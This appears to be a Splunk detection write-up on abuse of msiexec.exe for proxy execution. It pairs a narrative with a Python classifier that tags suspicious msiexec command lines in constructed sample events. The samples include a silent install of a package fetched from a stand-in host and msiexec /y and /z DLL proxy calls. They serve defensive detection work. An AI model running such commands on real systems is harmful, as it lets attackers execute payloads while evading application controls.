Description

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic
  • Last Updated: 2022-06-16
  • Author: Michael Haag, Splunk
  • ID: bea2e16b-4599-46ad-a95b-116078726c68

Narrative

Adversaries may abuse msiexec.exe to launch local or network-accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.
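The four behaviours this story's detections cover (remote download, DllRegisterServer via the /y option, DllUnregisterServer via /z, and discovery commands spawned by msiexec.exe) as a small classifier over constructed Sysmon-style process-creation events. This is an added Python example, not the Splunk searches themselves; the record field names and the set of discovery utilities are assumptions.

```python
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style; field names assumed)."""
    image: str
    command_line: str
    parent_image: str = ""


# Assumed, illustrative set of discovery utilities for the "spawn discovery command" case.
DISCOVERY_TOOLS = {"whoami.exe", "ipconfig.exe", "systeminfo.exe", "net.exe", "nltest.exe", "hostname.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)          # package fetched from a URL
REGISTER_RE = re.compile(r"(?:^|\s)[/-]y(?:\s|$)", re.IGNORECASE)      # msiexec /y <module> -> DllRegisterServer
UNREGISTER_RE = re.compile(r"(?:^|\s)[/-]z(?:\s|$)", re.IGNORECASE)    # msiexec /z <module> -> DllUnregisterServer


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> list[str]:
    """Return the story's TTP tags that apply to one event (empty list = nothing of note)."""
    tags: list[str] = []
    if basename(event.image) == "msiexec.exe":
        if URL_RE.search(event.command_line):
            tags.append("remote_download")      # legitimate web-based deployment exists, so triage, don't block
        if REGISTER_RE.search(event.command_line):
            tags.append("dll_register")
        if UNREGISTER_RE.search(event.command_line):
            tags.append("dll_unregister")
    if basename(event.parent_image) == "msiexec.exe" and basename(event.image) in DISCOVERY_TOOLS:
        tags.append("spawn_discovery")          # installers rarely need to enumerate the host
    return tags


def scan(events: list[ProcessEvent]) -> dict[str, list[str]]:
    """Map each flagged command line to its tags; unflagged events are dropped."""
    return {e.command_line: classify(e) for e in events if classify(e)}


# Constructed sample events, not real telemetry. The first one is a benign local install.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi /qn", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", "msiexec.exe /q /i http://example.invalid/pkg.msi", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /y C:\Users\Public\helper.dll", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /z C:\Users\Public\helper.dll", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\whoami.exe", "whoami /all", r"C:\Windows\System32\msiexec.exe"),
]

if __name__ == "__main__":
    for cmd, tags in scan(SAMPLE_EVENTS).items():
        print(f"{', '.join(tags):<16} {cmd}")
```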

Detections

Name                                                             | Technique | Type
-----------------------------------------------------------------|-----------|-----
Windows MSIExec DLLRegisterServer                                | Msiexec   | TTP
Windows MSIExec Remote Download                                  | Msiexec   | TTP
Windows MSIExec Spawn Discovery Command                          | Msiexec   | TTP
Windows MSIExec Unregister DLLRegisterServer                     | Msiexec   | TTP
Windows MSIExec With Network Connections                         | Msiexec   | TTP
Windows System Binary Proxy Execution MSIExec DLLRegisterServer  | Msiexec   | TTP
Windows System Binary Proxy Execution MSIExec Remote Download    | Msiexec   | TTP
Windows System Binary Proxy Execution MSIExec Unregister DLL     | Msiexec   | TTP

Reference

source | version: 1